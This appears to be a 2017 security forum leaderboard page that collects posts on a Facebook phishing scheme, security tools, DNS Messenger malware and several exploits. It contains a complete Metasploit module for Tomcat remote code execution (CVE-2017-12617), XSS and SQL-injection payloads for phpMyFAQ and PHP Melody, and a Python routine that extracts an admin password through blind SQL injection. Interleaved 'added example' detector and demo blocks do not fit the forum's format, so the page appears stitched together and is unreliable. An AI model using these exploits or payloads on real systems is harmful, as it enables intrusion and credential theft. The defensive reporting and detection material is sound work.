Leaderboard

Popular Content

Showing content with the highest reputation on 10/13/17 in all areas

  1. Earlier this month, Access Now’s Digital Security Helpline began to get reports of hacked Facebook accounts that allowed us to identify a new method for targeted “phishing,” also known as “spear phishing.” Today, we’re publishing details of the attack so that users are better informed and able to identify this attack.

Phishing is a method of obtaining unauthorized access to an account or service by tricking an authorized user into providing their credentials. This is usually done through mass spam messages. Spear phishing is an attack that targets a particular person and uses special messages that are more likely to appear genuine to a specific person. Read more about a recent spear phishing attack here.

The new attack targets people using Facebook, and it relies on your lack of knowledge about the platform’s “Trusted Contacts” feature. Trusted Contacts is a system created by Facebook to help you gain access to your account if you forget your password or your account is locked. If you enable Trusted Contacts, Facebook will ask you to identify three to five people. If you need access to your account, Facebook will send part of a code to each of these users that can be combined to gain access to your account.

Anyone who has a Facebook account could fall victim to the attack, but so far we’re seeing the majority of reports from human rights defenders and activists from the Middle East and North Africa.

How the attack works

Here’s how the attacker attempts to exploit your trust in order to extract the information needed to steal your account:

You get a message from an attacker on Facebook Messenger, who is using the compromised account of someone on your Friends list. The attacker asks for your help recovering their account, explaining that you are listed as one of their Trusted Contacts on Facebook, and tells you that you will receive a code for recovering their account.
Then the attacker triggers the “I forgot my password” feature for your Facebook account and requests a recovery code.
In an effort to help, you send the code you’ve just received to your “friend.”
Using the code, the attacker can now steal your account from you, and use it to victimize other people.

For visual learners, see here.

In the cases we have observed, the attacker doesn’t stop after compromising just one account. It’s replicated across users’ social networks. When a message comes from a “friend,” people tend to trust it. That makes it an especially effective attack vector.

How to defend yourself against attack

To help you stay safe, we encourage you to follow these recommendations:

Treat urgent, unexpected messages with suspicion: Phishing messages often appear to come from a trusted friend. But if you get an odd message, ask yourself: are you already aware of being on a list of “Trusted Contacts” for any of your Facebook friends?
Confirm with your friend: Try to verify your friend’s identity by telephone or in person.
Act slowly and with caution: Attacks are always evolving. In general, try to stay calm when you get a message where the sender appears to want to trigger a strong emotional reaction, like anger or fear. This might make you think you have to hurry, and it could impair your ability to evaluate the situation objectively. Don’t panic. Figure out what is really happening before you take action.
Learn how “Trusted Contacts” actually works: It doesn’t work the way the phishing message in this attack suggests. We explain the details below.

How Facebook’s “Trusted Contacts” feature really works

Here are the basics:

What is the Trusted Contacts feature? It’s an account recovery feature in Facebook that’s aimed at helping you regain access to your Facebook account and the email accounts and phone numbers linked to it.

How does the Trusted Contacts feature work? To activate this feature, you select three to five of your Facebook friends. If you lose access to your account, these friends can generate codes from their Facebook account and forward them to you. Note: Facebook does not send these text messages to your friends. It’s your friends who need to generate the codes for you, as shown in the screenshot below:

What to do if you get a message like the one we describe

If you get a message like the one we describe, asking you to send a message with a code from Facebook, don’t send anything to your “friend.” Instead, report the account here as soon as possible. If you need any help because your account has been hijacked, through this or any other attack vector, we encourage you to contact us at the Digital Security Helpline. We’re here every day, and no matter when you reach out, one of our incident handlers will reply to you within two hours. Here’s a step-by-step guide for contacting us, and you have the option of sending an email, encrypted if you desire, to help @ accessnow . org.

Here’s a visual to help illustrate the attack. Please spread the word!

Via accessnow.org
    2 points
  2. Synopsis: Cameradar hacks its way into RTSP CCTV cameras. An RTSP stream access tool that comes with its library. Link: https://github.com/EtixLabs/cameradar
    2 points
  3. Synopsis: Noriben is a Python-based script that works in conjunction with SysInternals Procmon to automatically collect, analyze, and report on run-time indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities. Link: https://github.com/Rurik/noriben
    2 points
  4. Synopsis: UEFITool is a cross-platform C++/Qt program for parsing, extracting and modifying UEFI firmware images. It supports parsing of full BIOS images starting with the flash descriptor or any binary files containing UEFI volumes. Original development was started here at MDL forums as a cross-platform analog to PhoenixTool's structure mode with some additional features, but the program's engine proved to be useful for other projects like UEFIPatch, UBU and OZMTool. Link: https://github.com/LongSoft/UEFITool
    2 points
  5. Synopsis: PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system. Link: https://github.com/ufrisk/pcileech/
    2 points
  6. Synopsis: From the attacker’s perspective, the more logical way to do things nowadays is to simply move to the next level down in the software stack: after boot code, that is the way to the BIOS. Intel Boot Guard is an excellent example of a complex technology in which there are many places where a small mistake allows an attacker to bypass the whole technology. Link: https://medium.com/@matrosov/bypass-intel-boot-guard-cc05edfca3a9
    2 points
  7. What life? Since next year everything older than 5 years expires.
    1 point
  8. # Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14619

1. Description

Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the "Title of your FAQ" field in the Configuration Module.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619

2. Proof of Concept

Steps to Reproduce:
1. Open the affected link http://localhost/phpmyfaq/admin/?action=config while logged in as a user with administrator privileges
2. Enter <marquee onscroll=alert(document.cookie)> in the “Title of your FAQ” field
3. Save the Configuration
4. Log in as any other user, or simply click on the phpMyFAQ link on the top-right-hand side of the web portal

3. Solution:

The vulnerability will be fixed in the next release of phpMyFAQ

# 0day.today [2017-10-13] #
# Source: 0day.today
    1 point
  9. This Metasploit module uploads a jsp payload and executes it.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
      'Description'    => %q{
        This module uploads a jsp payload and executes it.
      },
      'Author'         => 'peewpw',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
        ],
      'Privileged'     => false,
      'Platform'       => %w{ linux win }, # others?
      'Targets'        =>
        [
          [ 'Automatic',    { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ],
          [ 'Java Windows', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ],
          [ 'Java Linux',   { 'Arch' => ARCH_JAVA, 'Platform' => 'linux' } ]
        ],
      'DisclosureDate' => 'Oct 03 2017',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
      Opt::RPORT(8080)
    ])
  end

  # Upload a harmless JSP via the trailing-slash trick, fetch it without the
  # slash to see whether it was stored and compiled, then clean it up.
  def check
    testurl = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)

    send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data'   => "<% out.println(\"#{testcontent}\");%>"
    })

    res1 = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method' => 'GET'
    })

    if res1 && res1.body.include?(testcontent)
      # Remove the probe file; a short timeout so cleanup never stalls the check.
      send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
        'method' => 'DELETE'
      }, 1)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Same PUT-with-trailing-slash upload, this time with the JSP payload, then a
  # GET of the stored file to trigger execution.
  def exploit
    print_status("Uploading payload...")
    testurl = Rex::Text::rand_text_alpha(10)

    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data'   => payload.encoded
    })

    if res && res.code == 201
      res1 = send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method' => 'GET'
      })
      if res1 && res1.code == 200
        print_status("Payload executed!")
      else
        fail_with(Failure::PayloadFailed, "Failed to execute the payload")
      end
    else
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
    end
  end
end

# 0day.today [2017-10-13] #
# Source: 0day.today
    1 point
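As an added detection example (not part of the module above or of the 0day.today post), the following Python reads Tomcat access-log lines and flags the request shape the module produces: a PUT or DELETE whose path ends in `.jsp/` or `.jsp%20` (the suffix steers the request to the DefaultServlet, which strips it and writes a plain `x.jsp`), followed by a successful GET of the stored file. The log lines, hosts and file names are constructed for this example. The remedy on the server side is to keep the DefaultServlet's `readonly` init-param at its default of `true` in conf/web.xml; this detector is for the case where someone has relaxed it.

```python
import re

# Constructed Tomcat access-log lines (common log format) for this example;
# the hosts, timestamps and file names are made up, not from any real incident.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Oct/2017:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 1024
10.0.0.9 - - [13/Oct/2017:10:02:15 +0000] "PUT /kqzvmrtola.jsp/ HTTP/1.1" 201 0
10.0.0.9 - - [13/Oct/2017:10:02:16 +0000] "GET /kqzvmrtola.jsp HTTP/1.1" 200 37
10.0.0.9 - - [13/Oct/2017:10:02:17 +0000] "DELETE /kqzvmrtola.jsp/ HTTP/1.1" 204 0
10.0.0.7 - - [13/Oct/2017:10:03:00 +0000] "PUT /docs/notes.txt HTTP/1.1" 403 0
10.0.0.8 - - [13/Oct/2017:10:04:00 +0000] "PUT /shell.jsp%20 HTTP/1.1" 201 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Suffixes that route the request around the JSP servlet and are then stripped
# by the DefaultServlet before the file is written, so "x.jsp/" and "x.jsp%20"
# both end up on disk as "x.jsp".
BYPASS_SUFFIX_RE = re.compile(r'(\.jspx?)(?:/|%20)$', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize_jsp_path(path):
    """Map the request path to the file name Tomcat actually stores."""
    return BYPASS_SUFFIX_RE.sub(r'\1', path)


def find_jsp_upload_bypass(log_text):
    """Return (ip, path, reason) findings for CVE-2017-12617-style activity.

    A PUT/DELETE carrying a bypass suffix is always reported; a later 200 on a
    GET of the stored JSP is reported as execution of the uploaded file.
    """
    findings = []
    uploaded = {}  # stored path -> ip that uploaded it with 201 Created
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        method, path, status = rec['method'], rec['path'], int(rec['status'])
        if method in ('PUT', 'DELETE') and BYPASS_SUFFIX_RE.search(path):
            findings.append((rec['ip'], path, f'{method} with JSP suffix bypass'))
            if method == 'PUT' and status == 201:
                uploaded[normalize_jsp_path(path)] = rec['ip']
        elif method == 'GET' and status == 200 and path in uploaded:
            findings.append((rec['ip'], path, 'uploaded JSP executed'))
    return findings


if __name__ == '__main__':
    for ip, path, reason in find_jsp_upload_bypass(SAMPLE_LOG):
        print(f'{ip:<10} {reason:<30} {path}')
```

The PUT of `/docs/notes.txt` is deliberately not flagged: a writable DefaultServlet is a misconfiguration worth its own alert, but this rule is scoped to the JSP-execution bypass. Feed it your real access log with `find_jsp_upload_bypass(open(path).read())`.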
  10. Researchers have discovered a new version of the DNS Messenger attack which masquerades as the US Securities and Exchange Commission (SEC) and hosts malware on compromised government servers.

On Wednesday, security researchers from Cisco Talos revealed the results of an investigation into DNS Messenger, a fileless attack which uses DNS queries to push malicious PowerShell commands on compromised computers.

A new version of this attack, which the team say is "highly targeted in nature," now attempts to compromise victim systems by pretending to be the SEC Electronic Data Gathering, Analysis, and Retrieval (EDGAR) system -- recently at the heart of a data breach related to financial fraud -- in specially crafted phishing email campaigns.

These spoofed emails were made to seem legitimate, but should a victim open them and download a malicious attachment contained within, a "multi-stage infection process" begins.

The malicious attachments used in this campaign are Microsoft Word documents. However, rather than using macros or OLE objects to gain a foothold into a system, the threat actors used a less common method of infection, Dynamic Data Exchange (DDE), to perform code execution and install a remote access Trojan (RAT).

It is important to note that Microsoft says that DDE is not an exploitable issue, but rather a feature "by design," and will not be removed. Talos disagrees, and claims that the team has witnessed DDE "actively being used by attackers in the wild, as demonstrated in this attack."

According to Talos, the latest malware campaign is similar to its last evolution. The infection process uses DNS TXT records to create a bidirectional command-and-control (C2) channel, in which attackers are able to interact with the Windows Command Processor using the contents of DNS TXT record queries and responses generated from the threat actor's DNS server.

When opened, users are asked to permit external links to be retrieved. Should they agree, the malicious document reaches out to an attacker-controlled command-and-control (C&C) server which executes the first malware infection.

This malware was initially hosted on a Louisiana state government website, "seemingly compromised and used for this purpose," according to the team. Speaking to ZDNet, Craig Williams, Senior Technical Leader at Cisco Talos, said that by the time the findings were made public, the files had been removed from the server.

PowerShell commands then come into play. Code is retrieved, obfuscated, and then executed, which kicks off persistence on systems, registry rewrites and scheduled task creation, and DNS requests are made.

"In this particular case, the malware featured the capability to leverage WMI, ADS, scheduled tasks, as well as registry keys to obtain persistence," the researchers note. "The use of DNS as a conveyance for later stage code and C2 communications is also becoming more and more commonplace."

While the team was unable to obtain the next stage of PowerShell code from the C2 servers, Talos says it is likely that communications are restricted to prevent security researchers from being able to track the team and their techniques further, making it more likely that their DNS-based attacks can fly under the radar for longer periods.

However, researcher Anthony Yates says he was able to secure the final payload by analyzing some of the findings. Yates says that the payload is typical C&C bot code, and includes information gathering commands -- suggesting the purpose of the DNS attack is cyberespionage.

"Attackers often employ multiple layers of obfuscation in an attempt to make analysis more difficult, evade detection and prevention capabilities, and continue to operate under the radar by limiting their attacks to only the organizations that they are targeting," Talos says. "It is also important for organizations to be aware of some of the more interesting techniques that malware is using to execute malicious code on systems and gain persistence on systems once they are infected."

Via zdnet.com
    1 point
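The DNS TXT channel the article describes can be hunted for in resolver logs. The following Python is an added example, not code from Talos or from the article: it groups TXT queries by client and registered domain and flags the pairs that issue many TXT lookups whose leftmost label is long and high-entropy, which is what encoded C2 data looks like on the wire, while letting ordinary TXT traffic (SPF/DMARC/DKIM lookups) through. The log format, hosts, addresses, the c2-example.net domain and the thresholds are all constructed or assumed for this example; the registered domain is approximated as the last two labels, which a real deployment would replace with a public-suffix-list lookup.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log (epoch, client, query type, query name); the format,
# hosts and the c2-example.net domain are made up for this example.
SAMPLE_DNS_LOG = """\
1507888001 10.0.0.12 A www.example.com
1507888002 10.0.0.12 TXT _dmarc.example.com
1507888003 10.0.0.12 TXT 8a3f1c9e2b7d4a6f.stage2.c2-example.net
1507888004 10.0.0.12 TXT c4e9a1b3f7d2e8a0.stage2.c2-example.net
1507888005 10.0.0.12 TXT 5b2d7f8e1a9c3e4b.stage2.c2-example.net
1507888006 10.0.0.12 TXT e7a2c4f1b8d3a5e6.stage2.c2-example.net
1507888007 10.0.0.12 TXT 9d1f3a7c2e5b8a4d.stage2.c2-example.net
1507888008 10.0.0.13 TXT selector1._domainkey.example.com
1507888009 10.0.0.13 A mail.example.com
"""


def shannon_entropy(s):
    """Bits per character of s: ~4 for random hex, ~2-3 for dictionary words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname):
    """Approximation used by this example: the last two labels. Real code
    should consult the public suffix list so that co.uk etc. are handled."""
    labels = qname.rstrip('.').split('.')
    return '.'.join(labels[-2:])


def detect_txt_beacons(log_text, min_queries=5, min_entropy=3.0, min_label_len=12):
    """Return (client, domain, query_count, avg_entropy) for client/domain pairs
    whose TXT lookups look like an encoded C2 channel: many of them, each with a
    long, high-entropy leftmost label (the part that carries the data)."""
    label_entropies = defaultdict(list)  # (client, domain) -> [entropy, ...]
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != 'TXT':
            continue
        _, client, _, qname = parts
        first_label = qname.split('.')[0]
        if len(first_label) < min_label_len:
            continue  # _dmarc / DKIM selector lookups drop out here
        label_entropies[(client, registered_domain(qname))].append(
            shannon_entropy(first_label))
    hits = []
    for (client, domain), ents in label_entropies.items():
        avg = sum(ents) / len(ents)
        if len(ents) >= min_queries and avg >= min_entropy:
            hits.append((client, domain, len(ents), avg))
    return hits


if __name__ == '__main__':
    for client, domain, count, avg in detect_txt_beacons(SAMPLE_DNS_LOG):
        print(f'{client} -> {domain}: {count} TXT queries, avg label entropy {avg:.2f}')
```

Tune `min_queries` to your log window; the label-length and entropy thresholds are what separate the beacon from legitimate TXT lookups, which have short, word-like left labels. Response size is a second useful signal the sample log does not carry: TXT answers that are consistently long and change on every query are tasking, not records.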
  11. Vulnerabilities Summary

The following advisory describes three (3) vulnerabilities found in PHP Melody version 2.7.3.

PHP Melody is a “self-hosted Video CMS which evolved over the last 9 years. SEO optimization, unbeaten security and speed are advantages you no longer have to compromise on. A truly great CMS should help you save time and make your life easier not complicate it. Nobody enjoys spending time and money on inferior solutions. If you value your time, don’t settle for anything but the best video CMS with a proven track record, constant support and updates.”

The vulnerabilities found in PHP Melody are:
Stored PreAuth XSS that leads to administrator account takeover
SQL Injection (1)
SQL Injection (2)

Credit

An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response

PHP Melody has released patches to address this vulnerability. For more information: http://www.phpsugar.com/blog/2017/10/php-melody-v2-7-3-maintenance-release/

Vulnerabilities details

Stored PreAuth XSS that leads to administrator account takeover

User controlled input is not sufficiently sanitized, such that by sending a POST request to page_manager.php with the following parameters (vulnerable parameter: page_title)

page_manager.php?do=new&id=&author=&showinmenu=0&meta_keywords=555-555-0199@example.com&status=0&submit=Publish&page_name=Peter+Winter&page_title=408b7<script>alert(1)<%2fscript>f2faf

an attacker can trigger the vulnerability, and when an administrator/moderator/editor or anyone with privileges visits the admin page /admin/pages.php?page=1 the payload is triggered and the alert is executed.

SQL Injection (1)

User controlled input is not sufficiently sanitized; by sending a POST request to /phpmelody/admin/edit_category.php with the following parameters:

category=3&meta_keywords=555-555-0199@example.com&tag=categoryone&save=Save$name=Sample+Category+%231&image='&meta_title=555-555-0199@example.com

The vulnerable parameter is the POST “image” parameter. We can send a single quote (') to verify and the server will respond with an SQL error. We can inject SQL queries here or extract data. This attack requires an admin/moderator or editor to visit a malicious website that will submit the form with a malicious “image” parameter as the injection.

SQL Injection (2)

This SQL Injection is on a cookie value and can be exploited without any user interaction. The cookie value “aa_pages_per_page” is the vulnerable parameter and we can use time-based SQL Injection techniques to verify. The payload we used, ' AND benchmark(20000000%2csha1(1))-- , makes the server sleep for a long time (5-20 seconds).

Source: https://blogs.securiteam.com/index.php/archives/3464
    1 point
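To make SQL Injection (2) concrete, here is an added example (not PHP Melody's code, and written in Python over SQLite rather than the PHP/MySQL the advisory targets) of the same bug class: a per-page value read from a cookie and concatenated into the LIMIT clause. Because LIMIT accepts an expression, an injected subquery turns the number of rows returned into a yes/no oracle, so the admin password can be pulled out one character at a time. The advisory's benchmark()-based payload relies on the same idea, only its oracle is response time rather than row count. The table names, rows and password are constructed for the example; the fixed version parses the cookie as an integer, range-checks it and binds it as a parameter.

```python
import sqlite3


def build_db():
    """Constructed in-memory schema standing in for a CMS install; the table
    names, pages and the admin password are made up for this example."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO pages (title) VALUES ('Home'), ('About'), ('Contact'), ('Terms');
        CREATE TABLE admins (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO admins (name, password) VALUES ('admin', 's3cret');
    """)
    return conn


def list_pages_vulnerable(conn, per_page_cookie):
    """The bug: the cookie value is pasted straight into the SQL text."""
    sql = "SELECT title FROM pages LIMIT " + per_page_cookie
    return [row[0] for row in conn.execute(sql)]


def list_pages_fixed(conn, per_page_cookie):
    """The fix: enforce the type and range first, then bind the value so the
    database engine never sees attacker-controlled syntax."""
    try:
        per_page = int(per_page_cookie)
    except ValueError:
        raise ValueError("aa_pages_per_page must be an integer")
    if not 1 <= per_page <= 100:
        raise ValueError("aa_pages_per_page out of range")
    return [row[0] for row in conn.execute("SELECT title FROM pages LIMIT ?", (per_page,))]


def fixed_rejects(conn, cookie):
    """True if the hardened query refuses the cookie value."""
    try:
        list_pages_fixed(conn, cookie)
    except ValueError:
        return True
    return False


def blind_guess_char(conn, position, candidates="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover one password character through the vulnerable query: the LIMIT
    expression evaluates to 1 when the guess is right and 2 when it is wrong,
    so the page count leaks the answer (a boolean oracle; the advisory's
    benchmark() payload makes the same decision visible as a delay instead)."""
    for c in candidates:
        payload = ("(SELECT CASE WHEN (SELECT substr(password,%d,1) FROM admins "
                   "WHERE name='admin')='%s' THEN 1 ELSE 2 END)" % (position, c))
        if len(list_pages_vulnerable(conn, payload)) == 1:
            return c
    return None


def blind_dump_password(conn, length):
    """Chain the per-character oracle over the whole password."""
    return ''.join(blind_guess_char(conn, i) or '?' for i in range(1, length + 1))


if __name__ == '__main__':
    db = build_db()
    print('normal cookie, vulnerable query:', list_pages_vulnerable(db, '2'))
    print('recovered via LIMIT oracle      :', blind_dump_password(db, 6))
    print('hardened query rejects payload  :', fixed_rejects(db, "2 OR 1=1"))
```

The point of the oracle loop is that a cookie reaches the query with no user interaction, exactly the property the advisory highlights for SQL Injection (2): an attacker only needs to send requests. Casting to int is the whole fix here; parameter binding is kept as well so the query stays safe if the value is ever widened to a non-numeric type.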
  12. Synopsis: In past blog posts, we shared our approach to hunting for traditional in-memory attacks along with in-depth analysis of many injection techniques. As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection. I’ll discuss both eventing (real-time) and on-demand based detection strategies for these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complementary, and together result in the most robust defense against in-memory attacks. Link: https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks
    1 point
  13. Synopsis: Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. Link: https://github.com/redcanaryco/atomic-red-team (via https://twitter.com/redcanaryco/status/918236402814394368)
    1 point
  14. Synopsis: A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns by leveraging Sysmon and Windows Events logs. This project will provide specific chains of events exclusively at the host level so that you can take them and develop logic to deploy queries or alerts in your preferred tool or format such as Splunk, ELK, Sigma, GrayLog etc. This repo will follow the structure of the MITRE ATT&CK framework which categorizes post-compromise adversary behavior in tactical groups. In addition, it will provide information about hunting tools/platforms developed by the infosec community for testing and enterprise-wide hunting. Link: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook
    1 point
  15. Your Computer’s Hard Drive Can Be Used to Listen to What You’re Saying Link: https://blog.hackster.io/your-computers-hard-drive-can-be-used-to-listen-to-what-you-re-saying-808b83f19f80
    1 point
  16. Disassembler and Runtime Analysis (or how IDA Pro has some difficulties when displaying correctly the assembly of the patched run-time whilst using a Graph view) Link: http://blog.talosintelligence.com/2017/10/disassembler-and-runtime-analysis.html
    1 point